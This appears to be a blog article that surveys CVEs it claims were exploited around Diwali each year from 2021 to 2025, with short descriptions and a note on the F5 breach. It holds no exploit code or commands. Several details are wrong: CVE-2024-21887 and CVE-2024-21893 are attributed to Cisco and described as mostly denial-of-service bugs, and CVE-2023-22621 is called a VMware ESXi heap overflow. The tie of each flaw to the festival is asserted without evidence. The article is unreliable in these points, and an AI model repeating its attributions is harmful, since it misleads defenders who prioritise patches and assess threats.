Unmasking The Festival of Ligths Hidden Cyber Threats

Diwali, the festival of lights, marks not only a time of celebration and digital shopping surges but also a recurring period of heightened cyber threats. Over the past five years, threat actors have exploited critical software vulnerabilities to launch ransomware, phishing, and data theft campaigns timed perfectly with the festive rush. Here’s a year-by-year deep dive into the most impactful CVEs attackers leveraged during Diwali seasons from 2021 to 2025.

Diwali 2021 Vulnerabilities

1. CVE-2021-44228 (Log4Shell)
   A critical remote code execution (RCE) vulnerability in Apache Log4j, a widely used Java logging library. It allowed attackers to execute arbitrary code on affected servers by sending crafted log messages, leading to complete system takeover. This vulnerability was exploited in cloud services, e-commerce platforms, and enterprise applications.
2. CVE-2021-26855 & CVE-2021-27065 (ProxyLogon)
   Microsoft Exchange Server vulnerabilities enabling remote code execution and server-side request forgery. These allowed attackers to compromise mail servers, steal emails, and deploy ransomware or malware inside corporate environments.
3. CVE-2020-1472 (ZeroLogon)
   A critical privilege escalation flaw in Microsoft’s Netlogon Remote Protocol. Exploited by attackers to gain domain administrator privileges by impersonating any computer on a network, enabling widespread control of enterprise domains.
4. CVE-2021-21972
   VMware vSphere client RCE allowing attackers to execute arbitrary commands and gain control over virtualization infrastructure, leading to potential ransomware deployment or data theft.

Diwali 2022 Vulnerabilities

1. CVE-2022-30190 (Follina)
   Microsoft Support Diagnostic Tool (MSDT) RCE vulnerability exploited through malicious Word documents, allowing remote attackers to run code without user interaction on vulnerable Windows systems
2. CVE-2022-22965 (Spring4Shell)
   Remote code execution flaw in the Java Spring Framework allowing attackers to execute arbitrary code on vulnerable web apps by uploading crafted requests; it targeted server applications widely used in enterprise Java ecosystems.
3. CVE-2022-26134
   Remote code execution vulnerability in Atlassian Confluence Server and Data Center allowing attackers to remotely take over Confluence instances through specially crafted HTTP requests.
4. CVE-2022-21445
   Oracle Application Development Framework vulnerability permitting remote execution through crafted requests, often exploited in web portals and enterprise apps for lateral movement and data theft.

Diwali 2023 Vulnerabilities

1. CVE-2023-22621
   A heap overflow vulnerability in VMware ESXi hypervisor leading to remote code execution, which attackers exploited to deploy ransomware and extract data from virtualized infrastructure.
2. CVE-2023-36884
   Microsoft Office remote code execution vulnerability allowing malicious documents to execute arbitrary code when opened, frequently used in spear phishing campaigns.
3. Android and Chrome Zero-days
   Multiple zero-day vulnerabilities exploited in mobile and browser platforms allowing credential theft, privilege escalation, and persistent malware implants through infected apps and exploited browsing sessions.

Diwali 2024 Vulnerabilities

1. CVE-2024-42057
   A command injection vulnerability in Zyxel firewalls exploited by ransomware groups like Helldown to gain unauthorized access, execute shell commands, and spread laterally inside networks.
2. CVE-2024-21887 & CVE-2024-21893
   Network device vulnerabilities impacting Cisco and other vendors, mainly privilege escalation and denial of service bugs exploited in targeted espionage and ransomware campaigns.
3. Chrome RCE Zero-days
   Critical remote code execution vulnerabilities in Google Chrome abused by attackers in festive shopping campaigns to hijack sessions, steal cookies, and drop malware.

Diwali 2025 Vulnerabilities

1. CVE-2025-61882
   Unauthenticated remote code execution in Oracle E-Business Suite, exploited by Cl0p ransomware gang to gain complete control of enterprise applications and deploy ransomware payloads swiftly.
2. CVE-2025-24990
   Privilege escalation vulnerability in Microsoft Windows kernel drivers (ltmdm64.sys), allowing attackers to achieve SYSTEM-level privileges and evade endpoint detection solutions.
3. CVE-2025-54253
   Critical remote code execution flaw in Adobe Experience Manager exploited in widespread web shell deployments targeting government and private sector websites.
4. CVE-2025-59230
   Elevation of privilege vulnerability in Microsoft Windows kernel, prompting emergency patching directives due to active exploitation.
5. CVE-2025-41791
   Remote code execution vulnerability in MSHTML (Internet Explorer engine) used in phishing attachments exploiting legacy document viewers and browsers.
6. F5 Security Breach – F5 Networks disclosed a significant cybersecurity incident involving a sophisticated nation-state threat actor who breached its corporate networks. This breach, detected initially in early August, resulted in unauthorized access and exfiltration of sensitive data including source code and undisclosed vulnerability information related to F5’s flagship BIG-IP product suite. As organizations worldwide, including government agencies and Fortune 500 companies, depend on BIG-IP for application availability, access control, and security, this event poses a critical and ongoing risk.

Each vulnerability contributed to cybercrime surges during the Diwali seasons, facilitating spear phishing, ransomware deployment, data breaches, and enterprise network takeovers. The annual trend reflects evolving attacker sophistication leveraging software flaws combined with timely social engineering attacks exploiting festive digital activity.